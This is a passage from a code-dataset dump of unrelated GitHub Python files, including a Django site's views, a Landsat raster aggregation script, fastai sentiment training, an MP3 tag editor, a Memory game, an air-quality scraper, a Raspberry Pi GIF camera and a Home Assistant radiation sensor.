Arguments:\\n{1!r}\"\r\n message = template.format(type(ex).__name__, ex.args)\r\n self.error(message)\r\n self.module_classes.apf_queue.task_done()\r\n\r\n async def run_init_boot_module(self, module_name):\r\n try:\r\n await self.module_classes.run_init(module_name)\r\n except Exception as ex:\r\n self.error(f\"Could not ini: {module_name}\")\r\n template = \"An exception of type {0} occurred. 
Arguments:\\n{1!r}\"\r\n message = template.format(type(ex).__name__, ex.args)\r\n self.error(message)\r\n raise ValueError(\"Fatal error in core\")\r\n await self.wait_for_finished_boot()\r\n\r\n async def wait_for_finished_boot(self):\r\n while self.init_finished is not None:\r\n self.debug(f\"Waiting for finishing: {self.init_finished}\")\r\n await self.sleep(1)\r\n self.module_classes.boot_queue.task_done()\r\n\r\n def init_done(self, source: hass.Hass):\r\n \"\"\"Called from child (boot, apf) module\"\"\"\r\n finished = h.module_name(source)\r\n if self.init_finished is None:\r\n self.error(\"Already finished\")\r\n return\r\n if self.init_finished != finished:\r\n self.error(f\"Waiting for {self.init_finished} and finished: {finished}\")\r\n self.init_finished = None\r\n\r\n def terminate(self):\r\n self.debug(\"Terminate\")\r\n self._task_future.cancel() # type:ignore\r\n self._main_loop_running = False\r\n","repo_name":"JiriKursky/AppFramework","sub_path":"code/app_framework/bootstart.py","file_name":"bootstart.py","file_ext":"py","file_size_in_byte":9041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14062847802","text":"def read_rule(line):\n field, nums = line.strip().split(':')\n range_1, conj, range_2 = nums.strip().split()\n rule = {field: list(map(int, range_1.split('-'))) +\n list(map(int, range_2.split('-')))}\n return rule\n\ndef is_valid(ticket, rules):\n valid_keys = []\n for field_val in ticket:\n valid_fields = set()\n for x,y in rules.items():\n a,b,c,d = y\n if a <= field_val <=b or c <= field_val <= d:\n valid_fields.add(x)\n if valid_fields == set():\n return False\n valid_keys.append(valid_fields)\n return valid_keys\n\ndef name_fields(infile):\n data = 0\n rules = {}\n error_rate = 0\n with open(infile, 'r') as f:\n for line in f:\n if line.strip() == '':\n data += 1\n continue\n if data in [1,3]:\n if data == 1:\n field_options = [set(rules.keys()) for _ in range(len(rules.keys()))]\n data += 1\n continue\n if data == 0:\n rules.update(read_rule(line))\n elif data == 2:\n my_ticket = list(map(int, line.strip().split(',')))\n for idx, fields in enumerate(is_valid(my_ticket, rules)):\n field_options[idx].intersection_update(fields)\n elif data == 4:\n valid = is_valid(map(int, line.strip().split(',')), rules)\n if valid is not False:\n for idx, fields in enumerate(valid):\n field_options[idx].intersection_update(fields)\n return field_options, my_ticket\n\ndef unique_fields(field_options):\n field_positions = {}\n fields_found = 0\n ided_field = {}\n while fields_found < len(field_options):\n for i,j in enumerate(field_options):\n if len(j) == 1:\n field_positions[min(j)] = i\n ided_field = j\n fields_found += 1\n break\n field_options = [x.difference(ided_field) for x in field_options]\n return field_positions\n\n\n\n\n\n\n\nif __name__ == '__main__':\n infile = 'Advent16.txt'\n field_options, my_ticket = name_fields(infile)\n field_indices = unique_fields(field_options)\n depart = 1\n for x,y in field_indices.items():\n if 'departure' in x:\n depart *= my_ticket[y]\n print(depart)","repo_name":"jefallon/adventofcode2020","sub_path":"Day16b.py","file_name":"Day16b.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29269078783","text":"import logging\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.contrib.auth.models import 
User\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.views import generic\nfrom django.shortcuts import redirect\nfrom django.http import HttpResponse\n\nfrom ccshuffle.serialize import ResponseObject\nfrom .forms import LoginForm, RegistrationForm\nfrom .searchengine import SearchEngine\n\nlogger = logging.getLogger(__name__)\n\n\nclass IndexPageView(generic.TemplateView):\n template_name = 'index.html'\n\n def get(self, request, *args, **kwargs):\n request.session['last_url'] = request.get_full_path()\n kwargs['tags'] = SearchEngine.all_tags()\n search_for = request.GET.get('search_for', None)\n if search_for:\n search_request = SearchEngine.SearchRequest(search_phrase=request.GET.get('search_phrase', ''),\n search_for=search_for)\n search_response = SearchEngine.accept(search_request)\n search_result_offset = int(request.GET.get('start', 0))\n kwargs['search_result_count'] = len(search_response.search_result)\n kwargs['search_offset'] = search_result_offset\n kwargs['search_result'] = list(\n search_response.search_result[search_result_offset:search_result_offset + 10])\n if search_for == 'songs':\n kwargs['searched_tags'] = search_response.extracted_tags\n return super(IndexPageView, self).get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(type(self), self).get_context_data(**kwargs)\n context['globalLoginForm'] = LoginForm\n return context\n\n\nclass AboutPageView(generic.TemplateView):\n \"\"\"\n This class represents the view of the about page. This page contains information about the creative commons\n shuffle service.\n \"\"\"\n template_name = 'about.html'\n\n def get_context_data(self, **kwargs):\n context = super(type(self), self).get_context_data(**kwargs)\n context['globalLoginForm'] = LoginForm\n return context\n\n\nclass SignInPageView(generic.FormView):\n form_class = LoginForm\n success_url = reverse_lazy('home')\n template_name = 'signin.html'\n\n def form_valid(self, form):\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user = authenticate(username=username, password=password)\n logger.info(username + \" logged in.\")\n if user is not None and user.is_active:\n login(self.request, user)\n return super(SignInPageView, self).form_valid(form)\n else:\n return self.form_invalid(form)\n\n def form_invalid(self, form):\n form.cleaned_data['next'] = self.success_url\n return super(SignInPageView, self).form_invalid(form)\n\n def post(self, request, *args, **kwargs):\n self.success_url = request.POST.get('next', request.GET.get('next', reverse_lazy('home')))\n if self.success_url is None or len(self.success_url) == 0:\n self.success_url = reverse_lazy('home')\n return super(SignInPageView, self).post(request, *args, **kwargs)\n\n\nclass SignOutPageView(generic.RedirectView):\n \"\"\" The global sign out link. \"\"\"\n default_redirect_url = reverse_lazy('home')\n url = default_redirect_url\n\n def get(self, request, *args, **kwargs):\n self.url = request.POST.get('next', request.GET.get('next', reverse_lazy('home')))\n logger.debug(\"Current Url: %s \" % self.url)\n logger.info(\"Logout. 
(Redirected to %s)\" % self.url)\n logout(request)\n return super(SignOutPageView, self).get(request, *args, **kwargs)\n\n\nclass RegisterPageView(generic.CreateView):\n form_class = RegistrationForm\n model = User\n template_name = 'register.html'\n success_url = reverse_lazy('signin')\n\n def __init__(self):\n super(type(self), self).__init__()\n self.registration_form = None\n\n def get_form(self, form_class=None):\n if self.registration_form is None:\n self.registration_form = super(type(self), self).get_form(form_class)\n return self.registration_form\n\n def clear_form(self):\n del self.registration_form\n\n def post(self, request, *args, **kwargs):\n response = super(type(self), self).post(request, *args, **kwargs)\n # Success message for the registration, displayed on the 'sign in' page, where the user is redirected to.\n if self.registration_form.is_valid():\n messages.add_message(request, messages.SUCCESS,\n _('Welcome %(username)s ! Your account has been created, now you can login.' % {\n 'username': self.registration_form.cleaned_data.get('username')}))\n self.clear_form()\n return response\n\n def get_context_data(self, **kwargs):\n context = super(type(self), self).get_context_data(**kwargs)\n context['globalLoginForm'] = LoginForm\n return context\n\n @classmethod\n def is_username_available(cls, request):\n print(request.method)\n if request.is_ajax() and request.method == 'GET':\n username = request.GET.get('username', None)\n if username:\n return HttpResponse(\n ResponseObject('success', 'Fails', not User.objects.filter(username=username).exists()).json(),\n content_type=\"json\")\n else:\n return HttpResponse(ResponseObject('fail', 'The username to check must be given.', None).json(),\n content_type=\"json\")\n else:\n return redirect('404')\n\n\nclass NotFoundErrorPageView(generic.TemplateView):\n \"\"\"\n This class represents an error page, which will be displayed, if the page (the user looked for) can't be found on\n the server.\n \"\"\"\n template_name = '404.html'\n\n def get(self, request, *args, **kwargs):\n logger.info(\"Get (Not found) %s\" % request.session['last_url'])\n context = self.get_context_data(**kwargs)\n return self.render_to_response(context, status=404)\n\n def get_context_data(self, **kwargs):\n context = super(type(self), self).get_context_data(**kwargs)\n context['globalLoginForm'] = LoginForm\n return context\n","repo_name":"scottaglia/ccshuffle","sub_path":"shuffle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29796437079","text":"# ### BEGIN OF HEADER INFROMATION AND LOADING OF MODULES (Not all modules are actually required for the analysis) #######################\n# IMPORT SYSTEM MODULES\nfrom __future__ import division\nfrom math import sqrt\nimport sys, string\nimport os\n#import arcgisscripting\nimport time\nimport datetime\nimport shutil\nimport math\nimport numpy as np\nimport tarfile\n#np.arrayarange = np.arange\nfrom numpy.linalg import *\nfrom osgeo import gdal\nfrom osgeo.gdalconst import *\ngdal.TermProgress = gdal.TermProgress_nocb\nfrom osgeo import osr\ngdal.TermProgress = gdal.TermProgress_nocb\nfrom osgeo import gdal_array as gdalnumeric\n\n# ######################################## END OF HEADER INFROMATION AND LOADING OF MODULES ##########################################\n\n# ##### SET TIME-COUNT AND HARD-CODED FOLDER-PATHS #####\nstarttime = time.strftime(\"%a, %d %b %Y %H:%M:%S\", 
time.localtime())\nprint(\"\")\nprint(\"Starting process, time:\", starttime)\n\nroot_folder = \"E:\\\\tempdata\\\\mbaumann\\\\11_Windfall-classification_20120207\\\\RS_Data\\\\\"\nLandsat_file = \"E:\\\\tempdata\\\\mbaumann\\\\11_Windfall-classification_20120207\\\\RS_Data\\\\Landsat_Disturbance-map_mosaic_subset\"\n\nPerc_Disturb = \"E:\\\\tempdata\\\\mbaumann\\\\11_Windfall-classification_20120207\\\\RS_Data\\\\Landsat_Disturbance-map_mosaic_subset_MODIS-aggregated\"\n\n# ##### START THE SORTING #####\n\n# (1) Make pre-work steps --> load into gdal, generate output file\n\n# (1-A) Load Landsat into Gdal\nLandsat_file_gdal = gdal.Open(Landsat_file, GA_ReadOnly)\ncols = Landsat_file_gdal.RasterXSize\nrows = Landsat_file_gdal.RasterYSize\n\n# Re-Convert cols and rows, so that we have the edges (which are not 8x8 pixels) gonna get cut off\ncols = 8*(math.floor(cols/8))\nrows = 8*(math.floor(rows/8))\noutDrv = gdal.GetDriverByName('ENVI')\n\n# (1-B) Create output-file --> with 8x less cols and row, because we make the average of 8x8 pixels \noutputCols = int(cols/8)\noutputRows = int(rows/8)\n\ncols = cols-1\nrows = rows-1\n\nPDist = outDrv.Create(Perc_Disturb, outputCols, outputRows, 1, GDT_Float32)\nPDist.SetProjection(Landsat_file_gdal.GetProjection())\nPDist.SetGeoTransform(Landsat_file_gdal.GetGeoTransform())\n\n# (2) Process the data\n\n# (2-A) Build the output-array and set all values to zero.\ndataOut = np.zeros((outputRows, outputCols))\t# float64 is the default\n\n# (2-B) Initialize Moving window --> MODIS-pixel is ~236m, equaling approximately 8x8 Landsat pixels\nwindowsize = 8\n# define and initialize the row for the output-file\noutput_i = 0\noutput_j = 0\n\nfor i in range(0, cols, windowsize):\n\tif i + windowsize < cols:\n\t\tnumCols = windowsize\n\telse:\n\t\tnumCols = cols - i\n\n\t# define the col for the output-file\n\toutput_j = 0\t\n\tfor j in range(0, rows, windowsize):\n\t\tif j + windowsize < rows:\n\t\t\tnumRows = windowsize\n\t\telse:\n\t\t\tnumRows = rows - j\n\t\n# (2-C) Load in the bands as specific types --> 'float32', 'int16'\n\t\tLandsat = Landsat_file_gdal.GetRasterBand(1).ReadAsArray(i, j, numCols, numRows).astype(np.int)\t\t\t\n\n# (2-D) Mask everything into 1 (disturbance) and 0 (everything else)\t--> disturbance-values are 3 and 4 in the change map\n\t\tmask = np.equal(Landsat, 3)\t\t# cgabge back to 3\n\t\tD1 = np.choose(mask, (0, 1))\n\t\tmask = np.equal(Landsat, 4)\n\t\tD2 = np.choose(mask, (0, 1))\n\t\tmask = np.less(Landsat, 3)\n\t\tdisturb = D1 + D2\n\n# (2-E) Assess how many disturbance pixel are in the window and calculate the percentage\n\t\tdistPixel = np.sum(disturb)\n\t\tdistProp = (distPixel/(windowsize * windowsize))*100\n\n# (2-F) Write the value into the dataOut-Array\n\t\tdataOut[output_j, output_i] = distProp\n\t\toutput_j = output_j + 1\n# (2-G) Make the output_j and output_i continue to increase \n\toutput_i = output_i + 1\n\n# (2-H) Write the dataOut-array into the output-file\t\nPDist.GetRasterBand(1).WriteArray(dataOut, 0, 0)\t\n\t\nprint(\"--------------------------------------------------------\")\nprint(\"\")\n\nendtime = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())\nprint(\"start: \", starttime)\nprint(\"end: \", 
endtime)\nprint(\"\")","repo_name":"matthias-baumann/ScriptCollections_py","sub_path":"OLD_UnorderedScripts/baumann-etal_Windfall_C2_Create_Perc-Disturbance_MODIS-to-Landsat.py","file_name":"baumann-etal_Windfall_C2_Create_Perc-Disturbance_MODIS-to-Landsat.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32936441796","text":"from fastai.text.all import *\nimport wandb\nfrom fastai.callback.wandb import *\n\nwandb.init(project='fastainlp')\n\npath = untar_data(URLs.IMDB)\n\n# get_text_files gets all the text files in a path\nfiles = get_text_files(path, folders=['train', 'test', 'unsup'])\n# Logging\nprint(\"get text files \\n\")\n\n# tokenize 1\nspacy = WordTokenizer()\n# Logging\nprint(\"load spacy \\n\")\n# tokenize 2\ntkn = Tokenizer(spacy)\n# Logging\nprint(\"load tokenizer \\n\")\n\n# first 2000 movie reviews\ntxts = L(o.open().read() for o in files[:2000])\ntoks200 = txts[:200].map(tkn)\n# Logging\nprint(\"load first 2000 movie reviews \\n\")\n\n# numericalize\nnum = Numericalize()\nnum.setup(toks200)\nnums200 = toks200.map(num)\n# Logging\nprint(\"done numericalize \\n\")\n\ndl = LMDataLoader(nums200)\nx, y = first(dl)\n# logging\nprint(\"load LMDataLoader \\n\")\n\nget_imdb = partial(get_text_files, folders=['train', 'test', 'unsup'])\ndls_lm = DataBlock(\n    blocks=TextBlock.from_folder(path, is_lm=True),\n    get_items=get_imdb, splitter=RandomSplitter(0.1)\n).dataloaders(path, path=path, bs=128, seq_len=80)\n\n# Logging\nprint(\"load dls_lm \\n\")\n\n# initial PLM\nlearn = language_model_learner(\n    dls_lm, AWD_LSTM, drop_mult=0.3,\n    # perplexity() = torch.exp(cross_entropy); accuracy = the number of times the model is right at predicting the next word\n    metrics=[accuracy, Perplexity()], cbs=WandbCallback()\n).to_fp16()\n\n# first phase fine-tuned LM\nlearn.fit_one_cycle(1, 2e-2)\nlearn.save('1epoch')\nlearn.load('1epoch')\nlearn.unfreeze()\nlearn.fit_one_cycle(10, 2e-3)\nlearn.save_encoder('finetuned')\nprint(\"save encoder \\n\")\n\ndls_clas = DataBlock(\n    blocks=(TextBlock.from_folder(path, vocab=dls_lm.vocab), CategoryBlock),\n    get_y=parent_label,\n    get_items=partial(get_text_files, folders=['train', 'test']),\n    splitter=GrandparentSplitter(valid_name='test')\n).dataloaders(path, path=path, bs=128, seq_len=72)\nprint(\"load dls_clas \\n\")\n\ndls_clas.show_batch(max_n=3)\n\nlearn = text_classifier_learner(\n    dls_clas, AWD_LSTM, drop_mult=0.5, metrics=accuracy, cbs=WandbCallback()).to_fp16()\n\n# load would raise an exception if an incomplete model is loaded, so we use load_encoder\nlearn = learn.load_encoder('finetuned')\n# train with discriminative learning rates and gradual unfreezing; in NLP, unfreezing a few layers at a time performs better\nlearn.fit_one_cycle(1, 2e-2)\nlearn.freeze_to(-2) # unfreeze only the last two parameter groups\n# higher learning rate for final layers, lower learning rate for earlier ones\nlearn.fit_one_cycle(1, slice(1e-2/(2.6**4), 1e-2))\nlearn.freeze_to(-3) # unfreeze one more group\n# continue training at a lower learning rate\nlearn.fit_one_cycle(1, slice(5e-3/(2.6**4), 5e-3))\nlearn.unfreeze() # unfreeze the whole model\nlearn.fit_one_cycle(2, slice(1e-3/(2.6**4), 1e-3))\n","repo_name":"KyraZzz/fastai-nlp","sub_path":"text_transfer_learning.py","file_name":"text_transfer_learning.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"7023679871","text":"import struct\nimport argparse\nimport os\n\n# py 1.py -s \"D:\\Programming\\Python\\Python_Labs\\Lab_4\\\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-s', '--source', required=True)\nparser.add_argument('-d', '--demp', action='store_const', const=True, default=False)\nparser.add_argument('-g', '--genre')\nnamespace = parser.parse_args()\n\nnumber = 1\nfor address, dirs, files in os.walk(namespace.source):\n for music in files:\n\n if '.mp3' in music:\n musAddress = address + '\\\\' + music\n\n with open(musAddress, \"rb\") as fileRead:\n # Read last 3 byte\n fileRead.seek(-3, 2)\n zeroByte = int.from_bytes(fileRead.read(1), 'big')\n fileRead.read(1)\n genreByte = int.from_bytes(fileRead.read(1), 'big')\n fileRead.seek(0)\n dataAllFile = fileRead.read()\n\n # Write data\n with open(musAddress, \"wb\") as fileWrite:\n fileWrite.write(dataAllFile)\n\n # Set number\n if zeroByte != 0:\n fileWrite.seek(-3, 2)\n fileWrite.write(b'\\x00')\n fileWrite.write(struct.pack('B', number))\n number += 1\n\n # Set genre\n if namespace.genre != None and genreByte == 255:\n fileWrite.seek(-1, 2)\n fileWrite.write(struct.pack('B', int(namespace.genre)))\n\n # Read 128 byte tag\n fileRead.seek(-128, 2)\n dataTag = fileRead.read(128)\n\n # Decode and print tag\n unpacked = struct.unpack('3s 30s 30s 30s 4s 28s B B B', dataTag)\n\n result = ''\n for i in range(1, 4):\n result += '[' + unpacked[i].decode().replace('\\0', '') + ']'\n if i != 3:\n result += ' - '\n\n print(result)\n\n # Print demp tag\n if namespace.demp:\n for tag in unpacked:\n print(tag)\n","repo_name":"Oleja302/Python_Labs","sub_path":"Lab_4/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42364060730","text":"# -*- coding: utf-8 -*-\n\n'''\nThis project requires ImageMagick, a command-line program for image manipulation. 
To install ImageMagick, \nrun the following commands in a terminal window:\nsudo apt-get update\nsudo apt-get install imagemagick -y\n'''\n\n# import libraries\nfrom picamera import PiCamera, Color\nimport time\nfrom datetime import datetime\nimport os\nimport motor\n\n\ncamera = PiCamera()\n\n# camera configuration\n## set the resolution\ncamera.resolution = (320, 240)\n\n## rotate the image by 180 degrees\ncamera.rotation = 180\n\n## exposure\n### off, auto, night, nightpreview, backlight, spotlight, sports, snow, beach, verylong, fixedfps, antishake, fireworks\ncamera.exposure_mode = 'auto'\n\n## white balance\n### off, auto, sunlight, cloudy, shade, tungsten, fluorescent, flash, horizon\ncamera.awb_mode = 'auto'\n\n# GIF configuration\n# number of frames in the GIF\nnum_pic = 4\n\n# duration of each frame in the GIF (in milliseconds)\nnum_delay = 15\n\n# path for the pictures\npfad_pics = 'Pics_temp'\n\n# path for the GIF\npfad_gif = 'Gif/'\n\n\n\n# function to create the GIF\ndef gif(pfad_pics_parameter):\n    \n    # create a unique file name\n    now = datetime.now()\n    dateiname = now.strftime(\"%Y-%m-%d_%H:%M:%S.gif\")\n    gif_pfad_name = pfad_gif + dateiname\n    \n    # run the ImageMagick convert command to assemble the GIF from the session images\n    os.system('convert -delay ' + str(num_delay) + ' -loop 0 ' + pfad_pics_parameter + '/image*.jpg ' + gif_pfad_name)\n    return gif_pfad_name \n\n\n# function to capture the images and create the GIF\ndef camera_pic():\n    try:\n        # alpha: start the preview semi-transparent (0-255), e.g. alpha = 200\n        camera.start_preview(fullscreen = True) \n        # configure the overlay text\n        camera.annotate_text_size = 160 #6-160\n        camera.annotate_background = Color('black')\n        camera.annotate_foreground = Color('white')\n        \n        # the camera waits 2 seconds before the countdown starts\n        time.sleep(2) \n        \n        # countdown runs down 5.. 4..\n        for i in range(5,2,-1):\n            camera.annotate_text = \"%s\" % i\n            time.sleep(.5)\n        camera.annotate_text = \"\"\n        \n        \n        # create the folder for the images\n        pfad_temp = pfad_pics + '/pics_session'\n        os.mkdir(pfad_temp)\n        \n        \n        # at 3 the camera starts capturing\n        for i in range(num_pic):\n            camera.capture(pfad_temp + '/image{0:02d}.jpg'.format(i))\n            motor.forward(0.001,25)\n            time.sleep(0.2)\n        \n        # stop the preview \n        camera.stop_preview() \n        \n        # reset the motor\n        motor.backwards(0.001,100)\n        motor.setStep(0,0,0,0) \n        \n        # call gif() and pass it the temporary pics-session folder\n        pfad_gif_return = gif(pfad_temp)\n        \n        \n        # delete the contents of the pics-session folder\n        for root, dirs, files in os.walk(pfad_temp, topdown=False):\n            for name in files:\n                os.remove(os.path.join(root, name))\n            for name in dirs:\n                os.rmdir(os.path.join(root, name))\n        # delete the pics-session folder itself\n        os.rmdir(pfad_temp)\n        \n        return pfad_gif_return\n\n    except KeyboardInterrupt:\n        # if the program is interrupted with ctrl+c, stop the preview \n        camera.stop_preview()\n\n\n\n# run camera_pic()\nif __name__ == '__main__':\n    print(camera_pic())\n    print('fertisch')\n\n","repo_name":"lespowl/lasmaschuen","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28904785535","text":"# implementation of card game - Memory\r\n\r\nimport simplegui\r\nimport random\r\n\r\n# helper function to initialize globals\r\ndef new_game():\r\n    global WIDTH, cards, card_pos, exposed, state, click_count, n, m, exp_ind \r\n    WIDTH = 600\r\n    cards = list(range(9)) + list(range(9)) #generates a list with two of each number 0-8\r\n    card_pos = [WIDTH/36.0 - 15, 70] #determines the position of the first card (to be used in draw(canvas))\r\n    exposed = list(18 * [False]) #generates list of exposed elements, with True for exposed \r\n    state = 0 #determines the state of the game\r\n    click_count = 0.5\r\n    n = -1 #determines the position of the previously clicked card\r\n    m = -1 #determines the position of the pre-previously clicked card\r\n    exp_ind = [] #list with indexes of exposed elements\r\n    random.shuffle(cards)\r\n    \r\n# define event handlers\r\ndef mouseclick(pos):\r\n    global exposed, state, click_count, n, m, label, exp_ind\r\n    for i in range(0,18): #iterate over the card sections of the canvas\r\n        if pos[0] in range(i * WIDTH/18, (i + 1) * WIDTH/18): #to determine the section number in canvas\r\n            if i not in exp_ind: #checks if we click on an already exposed index\r\n                exposed[i] = True \r\n                exp_ind.append(i) #adds i to exposed indexes list 'exp_ind'\r\n                click_count += 0.5\r\n                if state == 0:\r\n                    state = 1\r\n                elif state == 1:\r\n                    if cards[i] == cards[n]:\r\n                        state = 0\r\n                    else:\r\n                        state = 2\r\n                elif state == 2:\r\n                    exp_ind.remove(m) #removes previous element from exp_ind list\r\n                    exp_ind.remove(n) #removes pre-previous element from exp_ind list\r\n                    exposed[n] = False\r\n                    exposed[m] = False\r\n                    state = 1\r\n                m = n\r\n                n = i\r\n    \r\n# cards are logically 50x100 pixels in size \r\ndef draw(canvas):\r\n    global card_pos, exposed, click_count, label\r\n    label.set_text(\"Turns = \" + str(int(click_count)))\r\n    n = 0\r\n    n2 = 0\r\n    #looks for exposed and not exposed cards and draws appropriate text or color\r\n    for i in range(len(cards)):\r\n        if not exposed[i]:\r\n            canvas.draw_line((card_pos[0] + 15 + n * WIDTH/18.0, 0), (card_pos[0] + 15 + n * WIDTH/18.0, 100), WIDTH/18.0, 'Green')\r\n        elif exposed[i]: \r\n            
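# draw the card's number once it has been exposed\r\n            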
canvas.draw_text(str(cards[i]),[card_pos[0] + (WIDTH/18.0) * n, card_pos[1]], 42, \"White\")\r\n        n += 1\r\n    #draws a separator between cards\r\n    for i in range(19):\r\n        canvas.draw_line([(WIDTH/18.0) * n2, 0], [(WIDTH/18.0) * n2, 100], 2, \"Violet\")\r\n        n2 += 1\r\n\r\n# create frame and add a button and labels\r\nframe = simplegui.create_frame(\"Memory\", 800, 100)\r\nframe.add_button(\"Reset\", new_game)\r\nlabel = frame.add_label(\"Turns = 0\")\r\n\r\n# register event handlers\r\nframe.set_mouseclick_handler(mouseclick)\r\nframe.set_draw_handler(draw)\r\n\r\n# get things rolling\r\nnew_game()\r\nframe.start()\r\n\r\n\r\n# Always remember to review the grading rubric","repo_name":"imusiievych/coursera_interactive_python","sub_path":"memory_coursera_game.py","file_name":"memory_coursera_game.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35796229285","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\nfrom sortedcontainers import SortedDict\n\ndef Wroc_Pow():\n    r = requests.get('http://powietrze.gios.gov.pl/pjp/current/station_details/table/129/1/0')\n    soup = BeautifulSoup(r.content, 'lxml')\n\n    tables = soup.findChildren('table')\n\n\n    my_table = tables[0]\n\n    answer = {}\n    rows = my_table.findChildren(['th', 'tr'])\n\n    regex = re.compile(r'[\\n\\r\\t]')\n\n\n    for row in rows:\n        row_text = []\n        date = ''\n        for cell in row.find_all('th'):\n            if cell.text.strip():\n                t = regex.sub(\"\", cell.text)\n                date = t\n\n        for cell in row.find_all('td'):\n            if cell.text.strip():\n                t = regex.sub(\"\", cell.text)\n                row_text.append(t)\n\n        answer[str(date)] = row_text\n\n    no_keys = {k: v for k, v in answer.items() if k}\n    result = {k: v for k, v in no_keys.items() if v}\n\n    for k in result.keys():\n        if len(result[k]) > 2:\n            result[k][0] = {'PM 2.5' : str(result[k][0])}\n            result[k][1] = {'NO2' : str(result[k][1])}\n            result[k][2] = {'CO' : str(result[k][2])}\n\n\n    mydict = { k:v for k,v in result.items() if len(result[k]) > 2 }\n    result = SortedDict(mydict)\n\n    for item in result.keys():\n        list_to_dict = {}\n        for i in result[item]:\n            list_to_dict.update(i)\n        result[item] = list_to_dict\n\n    import pandas as pd\n    df = pd.DataFrame.from_dict(result, orient='index')\n    df.reset_index(level=0, inplace=True)\n\n    import sqlite3\n    conn = sqlite3.connect(\"db.sqlite3\")\n    df.to_sql('Wrocław Powstańców Śląskich', conn, if_exists='replace', index=False)\n","repo_name":"adrianwizowski/WebSite","sub_path":"Wroclaw - Powstancow.py","file_name":"Wroclaw - Powstancow.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74469911824","text":"import json\nimport logging\nimport voluptuous as vol\nimport aiohttp\nfrom datetime import timedelta\nfrom datetime import datetime\n\nfrom homeassistant.components.sensor import PLATFORM_SCHEMA\nfrom homeassistant.helpers.aiohttp_client import async_get_clientsession\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.helpers.discovery import async_load_platform\n\nREQUIREMENTS = [ ]\n\n_LOGGER = logging.getLogger(__name__)\n\nCONF_ATTRIBUTION = \"Data provided by katasztrofavedelem.hu\"\nCONF_NAME = 'name'\nCONF_STATION = 'station'\n\nDEFAULT_NAME = 'Radioactivity HU'\nDEFAULT_STATION = ''\nDEFAULT_ICON = 'mdi:radioactive'\n\nSCAN_INTERVAL = timedelta(minutes=30)\nTWO_DAYS = 
172800 # secs\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n vol.Optional(CONF_STATION, default=DEFAULT_STATION): cv.string,\n})\n\nasync def async_setup_platform(hass, config, async_add_devices, discovery_info=None):\n name = config.get(CONF_NAME)\n station = config.get(CONF_STATION)\n\n async_add_devices(\n [RadioactivityHUSensor(hass, name, station )],update_before_add=True)\n\nasync def async_get_wqdata(self):\n wqjson = {}\n url = 'https://www.katasztrofavedelem.hu/application/uploads/cache/hattersugarzas/RAD.json'\n async with self._session.get(url) as response:\n rsp1 = await response.text()\n\n wqjson = json.loads(rsp1)\n\n return wqjson\n\nclass RadioactivityHUSensor(Entity):\n\n def __init__(self, hass, name, station):\n \"\"\"Initialize the sensor.\"\"\"\n self._hass = hass\n self._name = name\n self._station = station\n self._state = None\n self._wqdata = {}\n self._icon = DEFAULT_ICON\n self._session = async_get_clientsession(hass)\n self._attr = {}\n\n @property\n def extra_state_attributes(self):\n\n return self._attr\n\n async def async_update(self):\n wqdata = await async_get_wqdata(self)\n max_state = 0\n max_station = ''\n max_lasttime = ''\n\n self._attr[\"provider\"] = CONF_ATTRIBUTION\n self._attr[\"unit_of_measurement\"] = \"nSv/h\"\n\n if 'errorMessage' in wqdata and wqdata[\"errorMessage\"] == \"OK\":\n self._wqdata = wqdata\n\n today = datetime.now()\n\n for i in wqdata[\"data\"]:\n if len(self._station) != 0:\n if i[\"location\"] == self._station:\n if i[\"lastMeasurement\"] is not None:\n self._state = str(int(float(i[\"lastMeasurement\"])))\n else:\n continue\n if i[\"active\"] is not None:\n self._attr[\"active\"] = i[\"active\"]\n if i[\"lastMeasurementTime\"] is not None:\n self._attr[\"last_measurement_time\"] = i[\"lastMeasurementTime\"]\n self._attr[\"station\"] = self._station\n break\n else:\n if i[\"lastMeasurement\"] == None or i[\"active\"] == None:\n continue\n if i[\"active\"] == \"false\":\n continue\n\n if i[\"lastMeasurementTime\"] != None:\n tstamp = datetime.strptime(i[\"lastMeasurementTime\"],\"%Y-%m-%d %H:%M:%S\").date()\n if int(datetime.now().strftime('%s')) - int(tstamp.strftime('%s')) > TWO_DAYS:\n continue\n\n if float(i[\"lastMeasurement\"]) > max_state:\n max_state = float(i[\"lastMeasurement\"])\n max_station = i[\"location\"]\n max_lasttime = i[\"lastMeasurementTime\"]\n if len(self._station) == 0:\n self._state = str(int(max_state))\n self._attr[\"station\"] = max_station\n self._attr[\"last_measurement_time\"] = max_lasttime\n self._attr[\"active\"] = \"true\"\n\n return self._state\n\n @property\n def name(self):\n return self._name\n\n @property\n def state(self):\n return self._state\n\n @property\n def 